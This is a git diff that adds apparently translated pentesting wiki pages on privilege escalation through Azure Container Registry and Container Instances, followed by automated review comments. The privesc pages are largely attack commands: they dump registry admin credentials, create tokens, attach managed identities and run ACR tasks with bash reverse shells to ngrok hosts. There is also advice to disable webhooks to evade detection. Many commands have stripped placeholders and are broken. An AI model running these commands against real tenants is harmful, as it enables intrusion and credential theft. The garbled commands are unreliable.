diff --git a/src/SUMMARY.md b/src/SUMMARY.md index e3e18e17d..7ab73713c 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -408,6 +408,8 @@ - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) - [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md) - [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md) + - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md) + - [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-instances.md) - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB.md) - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) @@ -445,7 +447,7 @@ - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-post-exploitation.md) + - [Az - CosmosDB](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) 
@@ -460,14 +462,16 @@ - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) - [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md) - - [Az - CosmosDB](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md) + - [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md) + - [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md) + - [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md) - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) - - [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md) - - [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md) + - [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md) + - [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md) - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) - [Az - Service Bus 
Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) - [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md) diff --git a/src/images/registry_roles.png b/src/images/registry_roles.png new file mode 100644 index 000000000..f1d4a3615 Binary files /dev/null and b/src/images/registry_roles.png differ diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md new file mode 100644 index 000000000..14c2160b2 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md 
@@ -0,0 +1,64 @@ +# Az - Azure Container Instances Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Container Instances + +Kwa maelezo zaidi angalia: + +{{#ref}} +../az-services/az-container-instances.md +{{#endref}} + +### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action` + +Hizi ruhusa zinamruhusu mtumiaji **kutekeleza amri** katika kontena linalofanya kazi. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena. + +Ili kutekeleza `ls` na kupata matokeo ni rahisi kama: +```bash +az container exec --name --resource-group --exec-command 'ls' +``` +Ni pia inawezekana **kusoma matokeo** ya kontena kwa: +```bash +az container attach --name --resource-group +``` +Au pata rekodi za: +```bash +az container logs --name --resource-group +``` +### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +Hizi ruhusa zinaruhusu **kuunganisha utambulisho wa mtumiaji ulioendeshwa** kwa kundi la kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena. 
+ +Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena: +```bash +az rest \ +--method PATCH \ +--url "/subscriptions//resourceGroups//providers/Microsoft.ContainerInstance/containerGroups/?api-version=2021-09-01" \ +--body '{ +"identity": { +"type": "UserAssigned", +"userAssignedIdentities": { +"/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/": {} +} +} +}' \ +--headers "Content-Type=application/json" +``` +### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +Hizi ruhusa zinaruhusu **kuunda au kusasisha kundi la kontena** lenye **utambulisho wa mtumiaji uliopewa usimamizi** ulioambatanishwa nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena. +```bash +az container create \ +--resource-group > \ +--name nginx2 \ +--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \ +--assign-identity "/subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" \ +--restart-policy OnFailure \ +--os-type Linux \ +--cpu 1 \ +--memory 1.0 +``` +Zaidi ya hayo, inawezekana pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano **`--command-line` argument** yenye shell ya kurudi. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md new file mode 100644 index 000000000..092632804 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md 
@@ -0,0 +1,115 @@ +# Az - Azure Container Registry Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Azure Container Registry + +Kwa maelezo zaidi angalia: + +{{#ref}} +../az-services/az-container-registry.md +{{#endref}} + +### `Microsoft.ContainerRegistry/registries/listCredentials/action` + +Ruhusa hii inamruhusu mtumiaji kuorodhesha akiba za usimamizi za ACR. Hii ni muhimu ili **kupata ufikiaji kamili** juu ya akiba +```bash +az rest --method POST \ +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ContainerRegistry/registries//listCredentials?api-version=2023-11-01-preview" +``` +Ikiwa haki za msimamizi hazijawashwa, utahitaji pia ruhusa `Microsoft.ContainerRegistry/registries/write` ili kuziwasha kwa: +```bash +az rest --method PATCH --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.ContainerRegistry/registries/?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}' +``` +### `Microsoft.ContainerRegistry/registries/tokens/write`, `Microsoft.ContainerRegistry/registries/generateCredentials/action` + +Hizi ruhusa zinamruhusu mtumiaji **kuunda token mpya** yenye nywila za kufikia rejista. + +Ili kutumia `az cli` kuunda kama katika mfano ufuatao, utahitaji pia ruhusa `Microsoft.ContainerRegistry/registries/read`, `Microsoft.ContainerRegistry/registries/scopeMaps/read`, `Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read`, `Microsoft.ContainerRegistry/registries/tokens/read` +```bash +az acr token create \ +--registry \ +--name \ +--scope-map _repositories_admin +``` +### `Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action`, `Microsoft.ContainerRegistry/registries/scheduleRun/action`, `Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action` + +Hizi ruhusa zinamruhusu mtumiaji **kujenga na kuendesha picha** katika rejista. Hii inaweza kutumika **kutekeleza msimbo** katika kontena. 
+ +>[!WARNING] +> Hata hivyo, picha itatekelezwa katika **mazingira yaliyofungwa** na **bila ufikiaji wa huduma ya metadata**. Hii inamaanisha kwamba kontena haitaweza kupata **metadata ya mfano** hivyo hii si ya manufaa sana katika kupandisha mamlaka. +```bash +# Build +echo 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp//2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile +az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null +``` +### `Microsoft.ContainerRegistry/registries/tasks/write` + +Hii ni ruhusa kuu inayoruhusu kuunda na kusasisha kazi katika rejista. Hii inaweza kutumika **kutekeleza msimbo ndani ya kontena lenye utambulisho uliohifadhiwa** ndani yake. + +Hii ni mfano wa jinsi ya kutekeleza shell ya reverse katika kontena lenye utambulisho wa **system managed** uliohifadhiwa ndani yake: +```bash +az acr task create \ +--registry \ +--name reverse-shell-task \ +--image rev/shell:v1 \ +--file ./Dockerfile \ +--context https://github.com/carlospolop/Docker-rev.git \ +--assign-identity \ +--commit-trigger-enabled false \ +--schedule "*/1 * * * *" +``` +Njia nyingine ya kupata RCE kutoka kwa kazi bila kutumia hifadhi ya nje ni kutumia amri `az acr task create` pamoja na bendera `--cmd`. Hii itakuruhusu kuendesha amri ndani ya kontena. Kwa mfano, unaweza kuendesha shell ya kurudi kwa amri ifuatayo: +```bash +az acr task create \ +--registry \ +--name reverse-shell-task-cmd \ +--image rev/shell2:v1 \ +--cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \ +--schedule "*/1 * * * *" \ +--context /dev/null \ +--commit-trigger-enabled false \ +--assign-identity +``` +> [!TIP] +> Kumbuka kwamba ili kupewa kitambulisho kinachosimamiwa na mfumo hauhitaji ruhusa maalum, ingawa inapaswa kuwa imewezeshwa kabla katika rejista na kupewa ruhusa fulani ili iwe na manufaa. 
+ +Ili kupewa **kitambulisho kinachosimamiwa na mtumiaji pia** unahitaji ruhusa `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` kufanya: +```bash +az acr task create \ +--registry \ +--name reverse-shell-task \ +--image rev/shell:v1 \ +--file ./Dockerfile \ +--context https://github.com/carlospolop/Docker-rev.git \ +--assign-identity \[system\] "/subscriptions/>/resourcegroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities/" \ +--commit-trigger-enabled false \ +--schedule "*/1 * * * *" +``` +Ili **kusasisha** repo ya kazi iliyopo unaweza kufanya: +```bash +az acr task update \ +--registry \ +--name reverse-shell-task \ +--context https://github.com/your-user/your-repo.git +``` +### `Microsoft.ContainerRegistry/registries/importImage/action` + +Kwa ruhusa hii inawezekana **kuagiza picha kwenye azure registry**, hata bila kuwa na picha hiyo kwenye kifaa. Hata hivyo, kumbuka kwamba **huwezi kuagiza picha yenye lebo** ambayo tayari ipo kwenye registry. +```bash +# Push with az cli +az acr import \ +--name \ +--source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import +``` +Ili **kuondoa au kufuta lebo maalum ya picha** kutoka kwenye rejista unaweza kutumia amri ifuatayo. Hata hivyo, kumbuka kwamba utahitaji mtumiaji au token yenye **idhini ya kutosha** kufanya hivyo: +```bash +az acr repository untag \ +--name \ +--image : + +az acr repository delete \ +--name \ +--image : +``` +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-instances.md b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md new file mode 100644 index 000000000..19e96ef06 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-container-instances.md 
@@ -0,0 +1,45 @@ +# Az - Container Instances + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +Azure Container Instances (ACI) hutoa njia **isiyo na seva, ya mahitaji** ya kuendesha **containers** katika wingu la Azure. Unaweza **kupeleka** container moja au nyingi katika kundi lenye **hesabu inayoweza kupanuka**, **chaguzi za mtandao**, na ufanisi wa kuungana na **huduma nyingine za Azure** (kama Hifadhi, Mitandao ya Kijadi, au Rejista za Container). + +Kwa kuwa ni **kazi za muda mfupi**, huhitaji kusimamia miundombinu ya VM inayotumika — Azure inashughulikia hiyo kwa ajili yako. Hata hivyo, kutoka kwa **mtazamo wa usalama wa mashambulizi**, ni muhimu kuelewa jinsi **idhini**, **vitambulisho**, **mipangilio ya mtandao**, na **kumbukumbu** zinaweza kufichua maeneo ya shambulio na uwezekano wa mipangilio isiyo sahihi. + +### Configurations + +- Ili kuunda container, inawezekana kutumia picha ya umma, picha ya container kutoka kwa Azure Container Registry au hifadhi ya nje, ambayo inaweza **kuhitaji kusanidi nenosiri** ili kuipata. +- Kuhusu mtandao, inaweza pia kuwa na **IP ya umma** au kuwa **mipangilio ya kibinafsi**. +- Pia inawezekana kusanidi mipangilio ya kawaida ya docker kama: +- **Mabadiliko ya mazingira** +- **Vikundi** (hata kutoka Azure Files) +- **Bandari** +- **Mipaka ya CPU na kumbukumbu** +- **Sera ya kurejesha** +- **Kimbia kama mwenye mamlaka** +- **Amri ya kuendesha** +- ... + +## Enumeration + +> [!WARNING] +> Unapokuwa unafanya orodha ya ACI, unaweza kufichua mipangilio nyeti kama **mabadiliko ya mazingira**, **maelezo ya mtandao**, au **vitambulisho vilivyodhibitiwa**. Kuwa makini na kuandika au kuonyesha hizo. 
+```bash +# List all container instances in the subscription +az container list + +# Show detailed information about a specific container instance +az container show --name --resource-group + +# Fetch logs from a container +az container logs --name --resource-group + +# Execute a command in a running container and get the output +az container exec --name --resource-group --exec-command "ls" + +# Get yaml configuration of the container group +az container export --name --resource-group +``` + diff --git a/src/pentesting-cloud/azure-security/az-services/az-container-registry.md b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md new file mode 100644 index 000000000..eb7128b60 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-services/az-container-registry.md 
@@ -0,0 +1,157 @@ +# Az - Container Registry + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +Azure Container Registry (ACR) ni rejista salama, ya kibinafsi inayokuruhusu **hifadhi, kusimamia, na kufikia picha za kontena katika wingu la Azure**. Inajumuisha kwa urahisi na huduma kadhaa za Azure, ikitoa michakato ya kujenga na kutekeleza kiotomatiki kwa kiwango. Pamoja na vipengele kama geo-replication na uchambuzi wa udhaifu, ACR husaidia kuhakikisha usalama wa kiwango cha biashara na kufuata kanuni kwa programu zilizowekwa kwenye kontena. + +### Permissions + +Hizi ni **idhini tofauti** [kulingana na nyaraka](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) ambazo zinaweza kutolewa juu ya Rejista ya Kontena: + +- Upatikanaji wa Meneja wa Rasilimali +- Kuunda/kufuta rejista +- Kusukuma picha +- Kuvuta picha +- Kufuta data ya picha +- Kubadilisha sera +- Kusaini picha + +Pia kuna **majukumu yaliyojengwa ndani** ambayo yanaweza kutolewa, na pia inawezekana kuunda **majukumu ya kawaida**. + +![]() + +### Authentication + +> [!WARNING] +> Ni muhimu sana kwamba hata kama jina la rejista lina herufi kubwa, unapaswa kila wakati kutumia **herufi ndogo** kuingia, kusukuma na kuvuta picha. + +Kuna njia 4 za kuthibitisha kwenye ACR: + +- **Kwa Entra ID**: Hii ndiyo **njia ya kawaida** ya kuthibitisha kwenye ACR. Inatumia amri ya **`az acr login`** kuthibitisha kwenye ACR. Amri hii itahifadhi **tahadhari** katika faili ya **`~/.docker/config.json`**. Zaidi ya hayo, ikiwa unakimbia amri hii kutoka kwenye mazingira yasiyo na upatikanaji wa socket ya docker kama katika **cloud shell**, inawezekana kutumia bendera ya **`--expose-token`** kupata **token** ya kuthibitisha kwenye ACR. 
Kisha ili kuthibitisha unahitaji kutumia kama jina la mtumiaji `00000000-0000-0000-0000-000000000000` kama: `docker login myregistry.azurecr.io --username 00000000-0000-0000-0000-000000000000 --password-stdin <<< $TOKEN` +- **Kwa akaunti ya admin**: Mtumiaji wa admin amezuiliwa kwa kawaida lakini anaweza kuwezeshwa na kisha itakuwa inawezekana kufikia rejista kwa **jina la mtumiaji** na **nenosiri** la akaunti ya admin lenye ruhusa kamili kwa rejista. Hii bado inaungwa mkono kwa sababu huduma zingine za Azure zinazitumia. Kumbuka kwamba **nenosiri 2** zinaundwa kwa mtumiaji huyu na zote ni halali. Unaweza kuziwezesha kwa `az acr update -n --admin-enabled true`. Kumbuka kwamba jina la mtumiaji kwa kawaida ni jina la rejista (na si `admin`). +- **Kwa token**: Inawezekana kuunda **token** yenye **`scope map`** maalum (idhini) ili kufikia rejista. Kisha, inawezekana kutumia jina la token hii kama jina la mtumiaji na baadhi ya nenosiri zilizozalishwa kuthibitisha kwenye rejista kwa `docker login -u -p aregistry-url>` +- **Kwa Msingi wa Huduma**: Inawezekana kuunda **msingi wa huduma** na kutoa jukumu kama **`AcrPull`** ili kuvuta picha. Kisha, itakuwa inawezekana **kuingia kwenye rejista** kwa kutumia appId ya SP kama jina la mtumiaji na siri iliyozalishwa kama nenosiri. 
+ +Mfano wa skripti kutoka kwa [nyaraka](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-auth-service-principal) za kuunda SP yenye upatikanaji juu ya rejista: +```bash +#!/bin/bash +ACR_NAME=$containerRegistry +SERVICE_PRINCIPAL_NAME=$servicePrincipal + +# Obtain the full registry ID +ACR_REGISTRY_ID=$(az acr show --name $ACR_NAME --query "id" --output tsv) + +PASSWORD=$(az ad sp create-for-rbac --name $SERVICE_PRINCIPAL_NAME --scopes $ACR_REGISTRY_ID --role acrpull --query "password" --output tsv) +USER_NAME=$(az ad sp list --display-name $SERVICE_PRINCIPAL_NAME --query "[].appId" --output tsv) + +echo "Service principal ID: $USER_NAME" +echo "Service principal password: $PASSWORD" +``` +### Encryption + +Ni **Premium SKU** pekee inayounga mkono **encryption at rest** kwa picha na vitu vingine. + +### Networking + +Ni **Premium SKU** pekee inayounga mkono **private endpoints**. Nyingine zinasaidia tu **public access**. Endpoint ya umma ina muundo `.azurecr.io` na endpoint ya kibinafsi ina muundo `.privatelink.azurecr.io`. Kwa sababu hii, jina la registry lazima liwe la kipekee katika Azure yote. + +### Microsoft Defender for Cloud + +Hii inakuwezesha **scan the images** katika registry kwa **vulnerabilities**. + +### Soft-delete + +Kipengele cha **soft-delete** kinakuwezesha **recover a deleted registry** ndani ya idadi iliyotajwa ya siku. Kipengele hiki **kimezimwa kwa default**. + +### Webhooks + +Inawezekana **create webhooks** ndani ya registries. Katika webhook hii inahitajika kubainisha URL ambapo **request itatumwa kila wakati hatua ya push au delete inafanywa**. Aidha, Webhooks zinaweza kuashiria scope kuonyesha repositories (picha) ambazo zitakathiriwa. Kwa mfano, 'foo:*' inamaanisha matukio chini ya repository 'foo'. + +Kutoka kwa mtazamo wa washambuliaji, ni muhimu kuangalia hii **kabla ya kufanya hatua yoyote** katika registry, na kuondoa kwa muda ikiwa inahitajika, ili kuepuka kugunduliwa. 
+ +### Connected registries + +Hii kimsingi inaruhusu **mirror the images** kutoka registry moja hadi nyingine, kwa kawaida iliyoko kwenye eneo. + +Ina modes 2: **ReadOnly** na **ReadWrite**. Katika ya kwanza, picha zinachukuliwa tu **pulled** kutoka registry ya chanzo, na katika ya pili, picha zinaweza pia **pushed** kwa registry ya chanzo. + +Ili wateja waweze kufikia registry kutoka Azure, **token** inatengenezwa wakati registry iliyounganishwa inatumika. + +### Runs & Tasks + +Runs & Tasks inaruhusu kutekeleza katika Azure hatua zinazohusiana na kontena ambazo kawaida unahitaji kufanya kwa ndani au katika pipeline ya CI/CD. Kwa mfano, unaweza **build, push, and run images in the registry**. + +Njia rahisi ya kujenga na kuendesha kontena ni kutumia Run ya kawaida: +```bash +# Build +echo "FROM mcr.microsoft.com/hello-world" > Dockerfile +az acr build --image sample/hello-world:v1 --registry mycontainerregistry008 --file Dockerfile . + +# Run +az acr run --registry mycontainerregistry008 --cmd '$Registry/sample/hello-world:v1' /dev/null +``` +Hata hivyo, hiyo itasababisha kukimbia ambazo si za kuvutia sana kutoka kwa mtazamo wa mshambuliaji kwa sababu hazina utambulisho wa usimamizi ulioambatanishwa nao. + +Hata hivyo, **tasks** zinaweza kuwa na **system and user managed identity** iliyounganishwa nazo. Tasks hizi ndizo zinazofaa kwa **escalate privileges** katika kontena. Katika sehemu ya kupandisha mamlaka, inawezekana kuona jinsi ya kutumia tasks kupandisha mamlaka. + +### Cache + +Kipengele cha cache kinaruhusu **download images from an external repository** na kuhifadhi toleo jipya katika rejista. Inahitaji kuwa na **credentials configured** kwa kuchagua akreditivu kutoka Azure Vault. 
+ +Hii ni ya kuvutia sana kutoka kwa mtazamo wa mshambuliaji kwa sababu inaruhusu **pivot to an external platform** ikiwa mshambuliaji ana ruhusa ya kutosha kufikia akreditivu, **download images from an external repository** na kuunda cache pia inaweza kutumika kama **persistence mechanism**. + +## Enumeration + +> [!WARNING] +> Ni muhimu sana kwamba hata kama jina la rejista lina herufi kubwa, unapaswa kutumia herufi ndogo tu katika url ili kufikia hiyo. +```bash +# List of all the registries +# Check the network, managed identities, adminUserEnabled, softDeletePolicy, url... +az acr list + +# Get the details of a registry +az acr show --name + +# List tokens of a registry +az acr token list --registry --resource-group + +# List repositories in a registry +az acr repository list --name --resource-group + +# List the tags of a repository +az acr repository show-tags --repository --name --resource-group + +# List deleted repository tags +## At the time of this writing there isn't yet any command to restore it +az acr repository list-deleted --name + +# List tasks +## Check the git URL or the command +az acr task list --registry + +# List tasks runs +az acr task list-runs --registry + +# List connected registries +az acr connected-registry list --registry + +# List cache +az acr cache list --registry + +# Get cache details +az acr cache show --name --registry +``` +## Kuinua Haki & Baada ya Utekelezaji + +{{#ref}} +../az-privilege-escalation/az-automation-accounts-privesc.md +{{#endref}} + +## Marejeleo + +- [https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-authentication?tabs=azure-cli) +- 
[https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager](https://learn.microsoft.com/en-us/azure/container-registry/container-registry-roles?tabs=azure-cli#access-resource-manager) + +{{#include ../../../../banners/hacktricks-training.md}}
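
Review bot: In the first `src/SUMMARY.md` hunk (`@@ -408,6 +408,8`), both added entries are titled `Az - Container Registry`, but the second one links to `az-services/az-container-instances.md`. Rename the second entry to `Az - Container Instances` so the two pages are distinguishable in the table of contents.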
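
Review bot: In the `src/SUMMARY.md` privilege-escalation hunk (`@@ -460,14 +462,16`), the new `Az - Container Registry Privesc` and `Az - Container Instances Privesc` entries link into `pentesting-cloud/azure-security/az-services/`, while this patch creates `az-container-registry-privesc.md` and `az-container-instances-privesc.md` under `pentesting-cloud/azure-security/az-privilege-escalation/`. Point both links at the `az-privilege-escalation/` directory, otherwise they will not resolve to the files added here.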
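
Review bot: The command blocks in `az-privilege-escalation/az-container-instances-privesc.md` have lost their placeholder values. `az container exec --name --resource-group --exec-command 'ls'` passes nothing to `--name` or `--resource-group`, the `az rest` URL contains empty path segments (`/subscriptions//resourceGroups//providers/...`), and `--resource-group > \` in the `az container create` block leaves a bare `>` that a shell treats as a redirect. Restore a named placeholder after each flag and in each URL segment, and check whether the translation step is stripping angle-bracket text, since the same pattern appears in every block of this file.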
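
Review bot: In `az-privilege-escalation/az-container-registry-privesc.md`, the block under the `# Build` comment never builds anything: it writes a Dockerfile and then calls `az acr run` on `'$Registry/rev/shell:v1:v1'`, an image reference that carries two tags and that no earlier command in the block produced. The block also hard-codes what look like leftovers from the author's own test (`12345TestingRegistry` and the ngrok endpoints, which are written two different ways within the same line), whereas the other commands in the file leave these values as placeholders. Separately, the user-assigned identity example has `--assign-identity \[system\]` with escaped brackets and a stray `>` in `/subscriptions/>/resourcegroups//`, which suggests the same placeholder stripping seen elsewhere in the patch.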
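
Review bot: In `az-services/az-container-instances.md`, the banner include uses `../../../../banners/hacktricks-training.md` (four levels up), while the privesc pages added in this patch sit at the same directory depth and use `../../../banners/hacktricks-training.md`. One of the two is wrong; for a file in `src/pentesting-cloud/azure-security/az-services/` three levels up reaches `src/banners/`. The file also ends right after the enumeration code fence with no closing banner include, unlike the other three pages added here. In the Configurations list, the nested items (environment variables, volumes, ports and so on) are at the same `-` level as their parent bullet and need indentation to render as a sub-list.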
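
Review bot: In `az-services/az-container-registry.md`, the closing privilege-escalation section references `../az-privilege-escalation/az-automation-accounts-privesc.md`, which is a different service; it should reference `../az-privilege-escalation/az-container-registry-privesc.md`, the page this patch adds. The Permissions section contains an empty image link, `![]()`, even though the patch adds `src/images/registry_roles.png`, so the roles figure is never displayed. The banner includes use `../../../../banners/` where the sibling privesc pages at the same depth use `../../../banners/`, and the token login example `docker login -u -p aregistry-url>` has lost its placeholders and is not a usable command as written.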